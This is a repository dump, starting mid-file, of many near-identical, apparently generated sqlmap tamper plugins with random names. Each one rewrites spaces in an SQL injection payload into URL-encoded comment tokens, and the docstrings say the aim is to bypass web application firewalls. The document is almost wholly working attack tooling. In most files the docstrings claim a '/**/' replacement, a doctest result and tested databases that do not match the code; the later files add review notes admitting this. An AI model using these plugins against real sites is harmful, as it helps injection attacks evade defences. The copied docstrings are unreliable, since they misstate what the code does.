users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0d%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not 
quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0d%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/aBHpzUJt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/* %0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/* %0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/akWiTqmb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers 
(http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*!%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*!%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/fK4cXmhM.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application 
firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*`%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*`%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/jPkopBzE.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*%0f%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 
51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*%0f%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/lw35khJV.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 | pass 14 | 15 | def tamper(payload, **kwargs): 16 | """ 17 | Replaces space character (' ') with comments '/**/' 18 | 19 | Tested against: 20 | * Microsoft SQL Server 2005 21 | * MySQL 4, 5.0 and 5.5 22 | * Oracle 10g 23 | * PostgreSQL 8.3, 8.4, 9.0 24 | 25 | Notes: 26 | * Useful to bypass weak and bespoke web application firewalls 27 | 28 | >>> tamper('SELECT id FROM users') 29 | 'SELECT/**/id/**/FROM/**/users' 30 | """ 31 | 32 | retVal = payload 33 | 34 | if payload: 35 | retVal = "" 36 | quote, doublequote, firstspace = False, False, False 37 | 38 | for i in xrange(len(payload)): 39 | if not firstspace: 40 | if payload[i].isspace(): 41 | firstspace = True 42 | retVal += "%23aa/*/*/*=%0a" 43 | continue 44 | 45 | elif payload[i] == '\'': 46 | quote = not quote 47 | 48 | elif payload[i] == '"': 49 | doublequote = not doublequote 50 | 51 | elif payload[i] == " " and not doublequote and not quote: 52 | retVal += "%23aa/*/*/*=%0a" 53 | continue 54 | 55 | retVal += payload[i] 56 | 57 | return retVal -------------------------------------------------------------------------------- /tamper/nNkdOoSI.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    """No dependency checks are performed for this script."""


def tamper(payload, **kwargs):
    """
    Replaces whitespace in the payload with the token '%23aa/*/*/*%0b%0a'

    The first whitespace character of any kind is always replaced. After
    it, single and double quotes toggle a quote state and only a literal
    space (' ') outside both quote states is replaced; every other
    character is copied unchanged. Characters before the first whitespace
    are copied without quote tracking. A falsy payload is returned as is.

    Notes:
        * NOTE(review): the docstring shipped with this generated file
          described the '/**/' replacement (doctest result
          'SELECT/**/id/**/FROM/**/users') and listed Microsoft SQL
          Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g and PostgreSQL
          8.3, 8.4, 9.0 as tested; that text does not match the token
          emitted here and is presumably template text, not a test
          record for this script
        * Detection: the token is URL-encoded ('%23' decodes to '#',
          '%0a' to a line feed), so a filter that matches on literal
          spaces needs to decode and normalise comments first
    """

    if not payload:
        return payload

    token = "%23aa/*/*/*%0b%0a"
    pieces = []
    in_single, in_double, seen_whitespace = False, False, False

    for idx in xrange(len(payload)):
        char = payload[idx]

        if not seen_whitespace:
            # Up to the first whitespace nothing but that whitespace is touched
            if char.isspace():
                seen_whitespace = True
                pieces.append(token)
                continue

        elif char == '\'':
            in_single = not in_single

        elif char == '"':
            in_double = not in_double

        elif char == " " and not (in_double or in_single):
            pieces.append(token)
            continue

        pieces.append(char)

    return "".join(pieces)

# --------------------------------------------------------------------------------
# /tamper/pkROU2yh.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    """No dependency checks are performed for this script."""


def tamper(payload, **kwargs):
    """
    Replaces whitespace in the payload with the token '%23aa/*/*/**/%0a'

    The first whitespace character of any kind is always replaced. After
    it, single and double quotes toggle a quote state and only a literal
    space (' ') outside both quote states is replaced; every other
    character is copied unchanged. Characters before the first whitespace
    are copied without quote tracking. A falsy payload is returned as is.

    Notes:
        * NOTE(review): the docstring shipped with this generated file
          described the '/**/' replacement (doctest result
          'SELECT/**/id/**/FROM/**/users') and listed Microsoft SQL
          Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g and PostgreSQL
          8.3, 8.4, 9.0 as tested; that text does not match the token
          emitted here and is presumably template text, not a test
          record for this script
        * Detection: the token is URL-encoded ('%23' decodes to '#',
          '%0a' to a line feed), so a filter that matches on literal
          spaces needs to decode and normalise comments first
    """

    if not payload:
        return payload

    token = "%23aa/*/*/**/%0a"
    pieces = []
    in_single, in_double, seen_whitespace = False, False, False

    for idx in xrange(len(payload)):
        char = payload[idx]

        if not seen_whitespace:
            # Up to the first whitespace nothing but that whitespace is touched
            if char.isspace():
                seen_whitespace = True
                pieces.append(token)
                continue

        elif char == '\'':
            in_single = not in_single

        elif char == '"':
            in_double = not in_double

        elif char == " " and not (in_double or in_single):
            pieces.append(token)
            continue

        pieces.append(char)

    return "".join(pieces)

# --------------------------------------------------------------------------------
# /tamper/tm9qS0NR.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    """No dependency checks are performed for this script."""


def tamper(payload, **kwargs):
    """
    Replaces whitespace in the payload with the token '%23aa/*/*/*/*!%0a'

    The first whitespace character of any kind is always replaced. After
    it, single and double quotes toggle a quote state and only a literal
    space (' ') outside both quote states is replaced; every other
    character is copied unchanged. Characters before the first whitespace
    are copied without quote tracking. A falsy payload is returned as is.

    Notes:
        * NOTE(review): the docstring shipped with this generated file
          described the '/**/' replacement (doctest result
          'SELECT/**/id/**/FROM/**/users') and listed Microsoft SQL
          Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g and PostgreSQL
          8.3, 8.4, 9.0 as tested; that text does not match the token
          emitted here and is presumably template text, not a test
          record for this script
        * Detection: the token is URL-encoded ('%23' decodes to '#',
          '%0a' to a line feed), so a filter that matches on literal
          spaces needs to decode and normalise comments first
    """

    if not payload:
        return payload

    token = "%23aa/*/*/*/*!%0a"
    pieces = []
    in_single, in_double, seen_whitespace = False, False, False

    for idx in xrange(len(payload)):
        char = payload[idx]

        if not seen_whitespace:
            # Up to the first whitespace nothing but that whitespace is touched
            if char.isspace():
                seen_whitespace = True
                pieces.append(token)
                continue

        elif char == '\'':
            in_single = not in_single

        elif char == '"':
            in_double = not in_double

        elif char == " " and not (in_double or in_single):
            pieces.append(token)
            continue

        pieces.append(char)

    return "".join(pieces)

# --------------------------------------------------------------------------------
# /tamper/tsi0Jpkc.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    """No dependency checks are performed for this script."""


def tamper(payload, **kwargs):
    """
    Replaces whitespace in the payload with the token '%23aa/*/*/**%0a'

    The first whitespace character of any kind is always replaced. After
    it, single and double quotes toggle a quote state and only a literal
    space (' ') outside both quote states is replaced; every other
    character is copied unchanged. Characters before the first whitespace
    are copied without quote tracking. A falsy payload is returned as is.

    Notes:
        * NOTE(review): the docstring shipped with this generated file
          described the '/**/' replacement (doctest result
          'SELECT/**/id/**/FROM/**/users') and listed Microsoft SQL
          Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g and PostgreSQL
          8.3, 8.4, 9.0 as tested; that text does not match the token
          emitted here and is presumably template text, not a test
          record for this script
        * Detection: the token is URL-encoded ('%23' decodes to '#',
          '%0a' to a line feed), so a filter that matches on literal
          spaces needs to decode and normalise comments first
    """

    if not payload:
        return payload

    token = "%23aa/*/*/**%0a"
    pieces = []
    in_single, in_double, seen_whitespace = False, False, False

    for idx in xrange(len(payload)):
        char = payload[idx]

        if not seen_whitespace:
            # Up to the first whitespace nothing but that whitespace is touched
            if char.isspace():
                seen_whitespace = True
                pieces.append(token)
                continue

        elif char == '\'':
            in_single = not in_single

        elif char == '"':
            in_double = not in_double

        elif char == " " and not (in_double or in_single):
            pieces.append(token)
            continue

        pieces.append(char)

    return "".join(pieces)

# --------------------------------------------------------------------------------
# /tamper/wYVnJQl7.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    """No dependency checks are performed for this script."""


def tamper(payload, **kwargs):
    """
    Replaces whitespace in the payload with the token '%23aa/*/*/*-%0a'

    The first whitespace character of any kind is always replaced. After
    it, single and double quotes toggle a quote state and only a literal
    space (' ') outside both quote states is replaced; every other
    character is copied unchanged. Characters before the first whitespace
    are copied without quote tracking. A falsy payload is returned as is.

    Notes:
        * NOTE(review): the docstring shipped with this generated file
          described the '/**/' replacement (doctest result
          'SELECT/**/id/**/FROM/**/users') and listed Microsoft SQL
          Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g and PostgreSQL
          8.3, 8.4, 9.0 as tested; that text does not match the token
          emitted here and is presumably template text, not a test
          record for this script
        * Detection: the token is URL-encoded ('%23' decodes to '#',
          '%0a' to a line feed), so a filter that matches on literal
          spaces needs to decode and normalise comments first
    """

    if not payload:
        return payload

    token = "%23aa/*/*/*-%0a"
    pieces = []
    in_single, in_double, seen_whitespace = False, False, False

    for idx in xrange(len(payload)):
        char = payload[idx]

        if not seen_whitespace:
            # Up to the first whitespace nothing but that whitespace is touched
            if char.isspace():
                seen_whitespace = True
                pieces.append(token)
                continue

        elif char == '\'':
            in_single = not in_single

        elif char == '"':
            in_double = not in_double

        elif char == " " and not (in_double or in_single):
            pieces.append(token)
            continue

        pieces.append(char)

    return "".join(pieces)

# --------------------------------------------------------------------------------
# /tamper/xY6FuKhe.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    """No dependency checks are performed for this script."""


def tamper(payload, **kwargs):
    """
    Replaces whitespace in the payload with the token '%23aa/*/**//*!%0a'

    The first whitespace character of any kind is always replaced. After
    it, single and double quotes toggle a quote state and only a literal
    space (' ') outside both quote states is replaced; every other
    character is copied unchanged. Characters before the first whitespace
    are copied without quote tracking. A falsy payload is returned as is.

    Notes:
        * NOTE(review): the docstring shipped with this generated file
          described the '/**/' replacement (doctest result
          'SELECT/**/id/**/FROM/**/users') and listed Microsoft SQL
          Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g and PostgreSQL
          8.3, 8.4, 9.0 as tested; that text does not match the token
          emitted here and is presumably template text, not a test
          record for this script
        * Detection: the token is URL-encoded ('%23' decodes to '#',
          '%0a' to a line feed), so a filter that matches on literal
          spaces needs to decode and normalise comments first
    """

    if not payload:
        return payload

    token = "%23aa/*/**//*!%0a"
    pieces = []
    in_single, in_double, seen_whitespace = False, False, False

    for idx in xrange(len(payload)):
        char = payload[idx]

        if not seen_whitespace:
            # Up to the first whitespace nothing but that whitespace is touched
            if char.isspace():
                seen_whitespace = True
                pieces.append(token)
                continue

        elif char == '\'':
            in_single = not in_single

        elif char == '"':
            in_double = not in_double

        elif char == " " and not (in_double or in_single):
            pieces.append(token)
            continue

        pieces.append(char)

    return "".join(pieces)

# --------------------------------------------------------------------------------
# /tamper/zKBxZXW5.py:
# --------------------------------------------------------------------------------
#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def dependencies():
    """No dependency checks are performed for this script."""


def tamper(payload, **kwargs):
    """
    Replaces whitespace in the payload with the token '%23aa/*/*/*%0c%0a'

    The first whitespace character of any kind is always replaced. After
    it, single and double quotes toggle a quote state and only a literal
    space (' ') outside both quote states is replaced; every other
    character is copied unchanged. Characters before the first whitespace
    are copied without quote tracking. A falsy payload is returned as is.

    Notes:
        * NOTE(review): the docstring shipped with this generated file
          described the '/**/' replacement (doctest result
          'SELECT/**/id/**/FROM/**/users') and listed Microsoft SQL
          Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g and PostgreSQL
          8.3, 8.4, 9.0 as tested; that text does not match the token
          emitted here and is presumably template text, not a test
          record for this script
        * Detection: the token is URL-encoded ('%23' decodes to '#',
          '%0a' to a line feed), so a filter that matches on literal
          spaces needs to decode and normalise comments first
    """

    if not payload:
        return payload

    token = "%23aa/*/*/*%0c%0a"
    pieces = []
    in_single, in_double, seen_whitespace = False, False, False

    for idx in xrange(len(payload)):
        char = payload[idx]

        if not seen_whitespace:
            # Up to the first whitespace nothing but that whitespace is touched
            if char.isspace():
                seen_whitespace = True
                pieces.append(token)
                continue

        elif char == '\'':
            in_single = not in_single

        elif char == '"':
            in_double = not in_double

        elif char == " " and not (in_double or in_single):
            pieces.append(token)
            continue

        pieces.append(char)

    return "".join(pieces)

# --------------------------------------------------------------------------------